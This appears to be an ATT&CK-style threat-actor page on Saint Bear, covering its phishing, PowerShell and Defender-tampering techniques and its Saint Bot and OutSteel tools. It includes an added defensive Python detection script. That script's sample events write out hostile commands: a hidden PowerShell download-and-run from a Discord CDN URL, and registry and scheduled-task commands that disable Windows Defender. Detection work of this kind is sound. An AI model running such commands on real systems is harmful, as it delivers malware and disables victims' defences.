Saint Bear

Saint Bear is a Russian-nexus threat actor active since early 2021 that primarily targets entities in Ukraine and Georgia. The group is notable for two tools specific to its campaigns: the Saint Bot remote access tool and the OutSteel information stealer. For initial access, Saint Bear typically relies on phishing or on web staging of malicious documents and related file types, spoofing government or related entities.[1][2] Saint Bear has previously been confused with Ember Bear operations, but analysis of behaviors, tools, and targeting indicates these are distinct clusters.

ID: G1031
Associated Groups: Storm-0587, TA471, UAC-0056, Lorec53
Version: 1.0
Created: 25 May 2024
Last Modified: 12 August 2024

Associated Group Descriptions

Name Description
Storm-0587 [2]
TA471 [1]
UAC-0056 [1]
Lorec53 [1]

Techniques Used

Domain ID Name Use
Enterprise T1583 .006 Acquire Infrastructure: Web Services

Saint Bear has leveraged the Discord content delivery network to host malicious content for retrieval during initial access operations.[1]

Enterprise T1059 Command and Scripting Interpreter

Saint Bear has used the Windows Script Host (wscript) to execute intermediate files written to victim machines.[1]

.001 PowerShell

Saint Bear relies extensively on PowerShell execution from malicious attachments and related content to retrieve and execute follow-on payloads.[1]

.003 Windows Command Shell

Saint Bear's initial loaders also drop a malicious Windows batch file, available from open-source GitHub repositories, that disables Microsoft Defender functionality.[1]

.007 JavaScript

Saint Bear has delivered malicious Microsoft Office files containing an embedded JavaScript object that would, on execution, download and execute OutSteel and Saint Bot.[1]

Enterprise T1203 Exploitation for Client Execution

Saint Bear has leveraged vulnerabilities in client applications such as CVE-2017-11882 in Microsoft Office to enable code execution in victim environments.[1]

Enterprise T1589 .002 Gather Victim Identity Information: Email Addresses

Saint Bear gathered victim email information in advance of phishing operations for targeted attacks.[1]

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Saint Bear will modify registry entries and scheduled task objects associated with Windows Defender to disable its functionality.[1]

Enterprise T1656 Impersonation

Saint Bear has impersonated government and related entities both in phishing activity and in websites built to host malicious links that mimic legitimate resources.[2]

Enterprise T1112 Modify Registry

Saint Bear will leverage malicious Windows batch scripts to modify registry values associated with Windows Defender functionality.[1]

Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

Saint Bear clones .NET assemblies from other .NET binaries and clones code signing certificates from other software to obfuscate the initial loader payload.[1]

.013 Obfuscated Files or Information: Encrypted/Encoded File

Saint Bear initial payloads included encoded follow-on payloads stored in the resources of the first-stage loader.[1]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

Saint Bear uses a variety of file formats, such as Microsoft Office documents, ZIP archives, PDF documents, and other items as phishing attachments for initial access.[1]

Enterprise T1608 .001 Stage Capabilities: Upload Malware

Saint Bear has used the Discord content delivery network for hosting malicious content referenced in links and emails.[1]

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

Saint Bear has used an initial loader malware featuring a legitimate code signing certificate associated with "Electrum Technologies GmbH."[1]

Enterprise T1204 .001 User Execution: Malicious Link

Saint Bear has, in addition to email-based phishing attachments, used malicious websites masquerading as legitimate entities to host links to malicious files for user execution.[1][2]

.002 User Execution: Malicious File

Saint Bear relies on user interaction with, and execution of, malicious attachments and similar files for initial execution on victim systems.[1]

Enterprise T1497 Virtualization/Sandbox Evasion

Saint Bear contains several anti-analysis and anti-virtualization checks.[1]
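The technique entries above describe a chain that is visible in host process-creation telemetry: an Office document spawning wscript or PowerShell, batch-driven reg.exe and schtasks.exe changes to Windows Defender, and payloads pulled from the Discord CDN. The following detection logic is an added example written for this page, not code from MITRE ATT&CK or from the cited reports. It applies rules for those behaviors to Sysmon Event ID 1-style records (Image, ParentImage, CommandLine). Every sample event, path, hash-like value and URL below is constructed for illustration and is not an indicator from the reports; the Discord hostnames and the Defender registry and task paths are assumptions based on general knowledge of those products, not on the Saint Bear reporting.

```python
"""Added example: process-creation detections for the Saint Bear chain.

Rules: Office -> Windows Script Host (T1059.007), Office -> PowerShell and
encoded PowerShell (T1059.001), reg.exe / schtasks.exe / Set-MpPreference
tampering with Windows Defender (T1112, T1562.001), and Discord CDN URLs in
command lines (T1583.006 / T1608.001). All sample data is constructed.
"""
from __future__ import annotations

import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Assumed paths: both the policy hive and the product hive carry Defender kill switches.
DEFENDER_REG = re.compile(r"SOFTWARE\\(Policies\\)?Microsoft\\Windows Defender", re.I)
DEFENDER_TASK = re.compile(r"\\Microsoft\\Windows\\Windows Defender\\", re.I)
# Assumed hostnames for Discord attachment hosting.
DISCORD_CDN = re.compile(r"https?://(cdn\.discordapp\.com|media\.discordapp\.net)/attachments/", re.I)
ENCODED_PS = re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
MP_PREF = re.compile(r"Set-MpPreference\s+.*-Disable\w+", re.I)


def _base(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(event: dict) -> list[str]:
    """Return ATT&CK-tagged rule hits for one Sysmon Event ID 1-style record."""
    image = _base(event.get("Image", ""))
    parent = _base(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits: list[str] = []

    if image in SCRIPT_HOSTS and parent in OFFICE_PARENTS:
        hits.append("T1059.007 Office spawned Windows Script Host")
    if image == "powershell.exe":
        if parent in OFFICE_PARENTS:
            hits.append("T1059.001 Office spawned PowerShell")
        if ENCODED_PS.search(cmd):
            hits.append("T1059.001 encoded PowerShell command")
        if MP_PREF.search(cmd):
            hits.append("T1562.001 Set-MpPreference disabling a Defender feature")
    if image == "reg.exe" and re.search(r"\badd\b", cmd, re.I) and DEFENDER_REG.search(cmd):
        hits.append("T1112/T1562.001 reg.exe writing under Windows Defender keys")
    if image == "schtasks.exe" and re.search(r"/(change|delete)\b", cmd, re.I) and DEFENDER_TASK.search(cmd):
        hits.append("T1562.001 schtasks.exe altering a Windows Defender task")
    if DISCORD_CDN.search(cmd):
        hits.append("T1583.006/T1608.001 Discord CDN attachment URL in command line")
    return hits


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> hits, keeping only events that fired at least one rule."""
    return {i: h for i, ev in enumerate(events) if (h := detect(ev))}


# Constructed sample telemetry; none of these values are real indicators.
SAMPLE_EVENTS = [
    {  # 0: benign, user opens Word from Explorer
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\u\Downloads\lure.docx"',
    },
    {  # 1: Word launches the embedded JavaScript via wscript
        "Image": r"C:\Windows\System32\wscript.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": r"wscript.exe //E:JScript C:\Users\u\AppData\Local\Temp\invoice.js",
    },
    {  # 2: the script pulls a stage from the Discord CDN with PowerShell
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'powershell -w hidden -c "iwr https://cdn.discordapp.com/attachments/1111/2222/loader.exe -OutFile $env:TEMP\l.exe; start $env:TEMP\l.exe"',
    },
    {  # 3: batch file turns off Defender through the policy hive
        "Image": r"C:\Windows\System32\reg.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
    },
    {  # 4: batch file disables a Defender scheduled task
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'schtasks /Change /TN "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    },
    {  # 5: benign reg write unrelated to Defender
        "Image": r"C:\Windows\System32\reg.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"reg add HKCU\Software\Contoso\App /v Installed /t REG_DWORD /d 1 /f",
    },
    {  # 6: Excel spawns encoded PowerShell (two rules fire)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "CommandLine": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA",
    },
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, hits)
```

The parent-child rules deliberately key on the process relationship rather than on file names, since the lure documents and script names change per campaign while the Office-to-script-host and script-host-to-PowerShell hops do not. The Defender rules match both the reg.exe path and the Set-MpPreference cmdlet because the same policy value can be set either way; in production, pair them with Windows Defender operational log events (for example the "real-time protection disabled" events) so that tampering performed outside a command line is not missed.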

Software

ID Name References Techniques

S1017 OutSteel

OutSteel is uniquely associated with Saint Bear as a post-exploitation document collection and exfiltration tool.[1]

Techniques: Application Layer Protocol: Web Protocols, Automated Collection, Automated Exfiltration, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter: AutoHotKey & AutoIT, Data from Local System, Exfiltration Over C2 Channel, File and Directory Discovery, Indicator Removal: File Deletion, Ingress Tool Transfer, Lateral Tool Transfer, Masquerading: Match Legitimate Name or Location, Phishing: Spearphishing Link, Phishing: Spearphishing Attachment, Process Discovery, User Execution: Malicious Link, User Execution: Malicious File

S1018 Saint Bot

Saint Bot is closely correlated with Saint Bear operations as a common post-exploitation toolset.[1]

Techniques: Abuse Elevation Control Mechanism: Bypass User Account Control, Application Layer Protocol: Web Protocols, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: PowerShell, Data Encoding: Standard Encoding, Data from Local System, Debugger Evasion, Deobfuscate/Decode Files or Information, File and Directory Discovery, Hijack Execution Flow, Indicator Removal: File Deletion, Ingress Tool Transfer, Masquerading, Masquerading: Match Legitimate Name or Location, Native API, Obfuscated Files or Information, Obfuscated Files or Information: Software Packing, Phishing: Spearphishing Link, Phishing: Spearphishing Attachment, Process Discovery, Process Injection: Dynamic-link Library Injection, Process Injection: Asynchronous Procedure Call, Process Injection: Process Hollowing, Query Registry, Scheduled Task/Job: Scheduled Task, System Binary Proxy Execution: Regsvr32, System Binary Proxy Execution: InstallUtil, System Information Discovery, System Location Discovery, System Network Configuration Discovery, System Owner/User Discovery, User Execution: Malicious File, User Execution: Malicious Link, Virtualization/Sandbox Evasion: Time Based Evasion, Virtualization/Sandbox Evasion: System Checks

References